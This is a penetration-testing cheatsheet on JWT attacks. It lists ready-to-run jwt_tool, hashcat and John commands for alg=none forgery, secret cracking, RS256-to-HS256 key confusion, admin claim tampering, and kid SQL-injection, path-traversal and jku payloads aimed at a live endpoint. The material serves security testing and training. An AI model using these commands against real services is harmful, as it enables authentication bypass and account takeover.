← All Cheatsheets
web-pentest

JWT Attacks

JSON Web Token attacks — decoding, alg=none, weak-secret cracking (hashcat/jwt_tool), RS256→HS256 key confusion, claim tampering and kid/jku/x5u header injection.

1 views Jun 2026 lazyhackers
Recon & Decode (3)
echo $JWT | cut -d. -f1,2 | tr '.' '\n' | base64 -d 2>/dev/null
Decode header + payload without verifying
decode recon
python3 jwt_tool.py <JWT>
Parse and display a token with jwt_tool
jwt_tool recon
jwt_tool <JWT> -T
Interactive tamper mode
jwt_tool tamper
alg=none Bypass (2)
jwt_tool <JWT> -X a
Forge a token with alg=none (strip the signature)
algnone forge
header {"alg":"none"} + payload + "."
Manual alg=none — note the trailing dot, empty signature
algnone manual
Weak Secret Cracking (3)
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
Crack an HS256 signing secret offline
crack hashcat hs256
jwt_tool <JWT> -C -d /usr/share/wordlists/rockyou.txt
Dictionary-crack the HMAC secret with jwt_tool
crack jwt_tool
john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256
Crack the secret with John
crack john
Key Confusion (RS256 -> HS256) (2)
jwt_tool <JWT> -X k -pk public.pem
Sign with the RSA public key as the HMAC secret (alg confusion)
confusion rs256 hs256
openssl s_client -connect target.com:443 | openssl x509 -pubkey -noout > public.pem
Recover the server public key for the confusion attack
confusion pubkey
Claim Tampering (2)
edit {"role":"admin"} / {"admin":true} / {"sub":"administrator"}
Escalate by editing privilege claims, then re-sign
tamper privesc
jwt_tool <JWT> -I -pc role -pv admin -S hs256 -p secret
Inject a claim and re-sign with a known secret
tamper jwt_tool
Header Injection (kid / jku / x5u) (4)
"kid":"../../../../dev/null"
kid path traversal → sign with an empty/known key
kid traversal
"kid":"x' UNION SELECT 'mysecret'-- -"
kid SQL injection to control the verification key
kid sqli
jwt_tool <JWT> -X s -ju http://10.10.14.1/jwks.json
jku/x5u header → point verification at your JWKS
jku jwks ssrf
jwt_tool <JWT> -M at -t https://target.com/api -rh "Authorization: Bearer JWT"
Run all tests against a live endpoint
jwt_tool scan

Related Articles

5
Web Hacking

JSON and YAML Unsafe Deserialization

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js …

20m read
Web Hacking

Supply Chain Attacks

Deep technical guide to software supply chain attacks — dependency confusion, malicious np…

16m read
Web Hacking

Cross-Site Scripting Mastery

Complete XSS guide covering all attack types, filter bypasses, CSP evasion, cookie stealin…

19m read
Web Hacking

File Upload to RCE

Complete file upload exploitation guide — MIME bypass, double extension tricks, polyglot J…

12m read
Web Hacking

Advanced SSRF

Complete SSRF exploitation guide — AWS IMDSv1/v2 credential theft, GCP/Azure metadata, bli…

16m read

Related Courses

2
Intermediate

Web Application Penetration Testing

Master web hacking from recon to reporting

30 · 9.3h
Intermediate

Bug Bounty Hunting — From Recon to Bounty

The practical playbook for finding real bugs on real targets. Recon methodology, vulnerabi…

0 · 7.2h